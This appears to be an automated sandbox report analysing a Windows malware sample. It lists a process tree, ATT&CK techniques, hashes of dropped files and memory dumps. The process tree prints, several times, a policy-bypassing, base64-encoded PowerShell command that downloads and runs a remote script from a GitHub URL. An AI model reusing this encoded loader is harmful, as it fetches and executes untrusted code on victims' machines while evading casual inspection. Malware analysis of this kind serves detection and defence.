C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
- Suspicious use of WriteProcessMemory
PID:552

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
- Suspicious use of WriteProcessMemory
PID:396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blacklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:648

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES7B02.tmp
MD5
d5e28cdeeb350007824b8d16b12281c1

SHA1
5eab46d0981e7a1305c35909b3fc12175d3619cb

SHA256
bf971519c14ff68446285494ee7da17cda21ade9eb681d30623c3d7e0965f028

SHA512
1c5f9fd93b80183b56e72a3cf89b3b2e68e4a4d9503d0a2c32b70d6dd9bd832b7a3e37d9cf6cb14c1f3be7f4fd9be19d972461ab9d98258514325c9c22809ba4

Download Submit
C:\Users\Admin\AppData\Local\Temp\bsk1nuli\bsk1nuli.dll
MD5
6318c3b9a1de7294e015e0f43d83c7f7

SHA1
026f671c2f186a6b3d299e999c5d9392cbb2232b

SHA256
f383aed2827d38d8183e857162fe3d92e5ded4139ce5873da76e3208481221ca

SHA512
fdf2b139e70083dc9687f6473857aa58a1ba487734ee7d0a16d9facd8d97d1cf9827640237e03262699274a798278231759b7bce9c356521ad314188a53f8af0

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
MD5
dac6b25db50155c0c78d5bf64fb95fa3

SHA1
9e49c8f7a6df94acdefd0daa4c330f92f6d01d0d

SHA256
6967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf

SHA512
679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.zip
MD5
7cac19b2868c41555db4b71219217f9b

SHA1
d6f77db578db3c5c572c3a944d9072ed00560dcb

SHA256
d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a

SHA512
5bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bsk1nuli\CSC5AFA9353C6024F6DB26019D1805C12.TMP
MD5
0e951b25d6d3e6fcd0146ee211d6bca8

SHA1
0a337bcf83e5311229acd85004d713065dff5ba2

SHA256
d68214026c8edd7a377c10933f24b8dea5ae60f2d008cd8c642f7a089808d06a

SHA512
25da5a631c507e44d40a2fba7a0baf3508d64f92f5e4368f5d0110355d89e4d84234e1cd1ab3f5ea4cbea3581f2306fe970f4762f660eb3024a3698f71a37514

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bsk1nuli\bsk1nuli.0.cs
MD5
6f235215132cdebacd0f793fe970d0e3

SHA1
2841e44c387ed3b6f293611992f1508fe9b55b89

SHA256
ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

SHA512
a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bsk1nuli\bsk1nuli.cmdline
MD5
f11567b52f2859819d6f24d024c44cb7

SHA1
0e898a841c63cb114a4471a4851b2cbeef26e2ee

SHA256
733e388109670a26260067308a1a00a73834d6791f31d978bc2d887496bc06ab

SHA512
fb665988c38dcdd842cb7a406e2642a133ff661c11199928d79086cfaa5a39c24ba16a84d063f51ba9eb73f3dccca05b8c19b64044bd910688677b3b992adc05

Download Submit
\Windows\Branding\mediasrv.png
MD5
eeb448ea2709c57b9ea2e223d0c79396

SHA1
38331dd027386151ee37a29a7820570a76427b02

SHA256
c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272

SHA512
c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc

Download Submit
\Windows\Branding\mediasvc.png
MD5
bb873bd05a47f502ee4ed3c4ea749a4f

SHA1
e55a6bf49a4833fb9e9b123df39dac9bf507f75a

SHA256
a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a

SHA512
ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548

Download Submit
memory/396-45-0x0000000000000000-mapping.dmp

Download
memory/416-51-0x0000000000000000-mapping.dmp

Download
memory/508-7-0x0000000000000000-mapping.dmp

Download
memory/648-47-0x00007FF93EFE0000-0x00007FF93F9CC000-memory.dmp

Filesize
9.9MB

Download
memory/648-46-0x0000000000000000-mapping.dmp

Download
memory/908-10-0x0000000000000000-mapping.dmp

Download
memory/932-17-0x0000000000000000-mapping.dmp

Download
memory/960-52-0x0000000000000000-mapping.dmp

Download
memory/1844-15-0x0000000000000000-mapping.dmp

Download
memory/2000-16-0x0000000000000000-mapping.dmp

Download
memory/2044-41-0x0000000000000000-mapping.dmp

Download
memory/2268-18-0x0000000000000000-mapping.dmp

Download
memory/2328-39-0x0000000000000000-mapping.dmp

Download
memory/2376-19-0x0000000000000000-mapping.dmp

Download
memory/2440-20-0x0000000000000000-mapping.dmp

Download
memory/2728-21-0x0000000000000000-mapping.dmp

Download
memory/2892-22-0x0000000000000000-mapping.dmp

Download
memory/3036-26-0x0000000000000000-mapping.dmp

Download
memory/3332-24-0x0000000000000000-mapping.dmp

Download
memory/3516-27-0x0000000000000000-mapping.dmp

Download
memory/3824-32-0x0000000000000000-mapping.dmp

Download
memory/3928-43-0x0000000000000000-mapping.dmp

Download
memory/3984-33-0x0000000000000000-mapping.dmp

Download
memory/4032-38-0x0000000000000000-mapping.dmp

Download
memory/4300-44-0x0000000000000000-mapping.dmp

Download
memory/4316-2-0x0000000000000000-mapping.dmp

Download
memory/4316-3-0x00007FF93EFE0000-0x00007FF93F9CC000-memory.dmp

Filesize
9.9MB

Download
memory/4316-4-0x00000195F4D70000-0x00000195F4D71000-memory.dmp

Filesize
4KB

Download
memory/4316-5-0x00000195F4F20000-0x00000195F4F21000-memory.dmp

Filesize
4KB

Download
memory/4316-14-0x00000195F4EB0000-0x00000195F4EB1000-memory.dmp

Filesize
4KB

Download
memory/4372-23-0x0000000000000000-mapping.dmp

Download
memory/4464-25-0x0000000000000000-mapping.dmp

Download
memory/4468-36-0x0000000000000000-mapping.dmp

Download
memory/4472-37-0x0000000000000000-mapping.dmp

Download
memory/4484-30-0x0000000000000000-mapping.dmp

Download
memory/4624-31-0x0000000000000000-mapping.dmp

Download
memory/4700-40-0x0000000000000000-mapping.dmp

Download
memory/4720-35-0x0000000000000000-mapping.dmp

Download
memory/4748-34-0x0000000000000000-mapping.dmp

Download
memory/4760-1-0x0000000001770000-0x0000000001771000-memory.dmp

Filesize
4KB

Download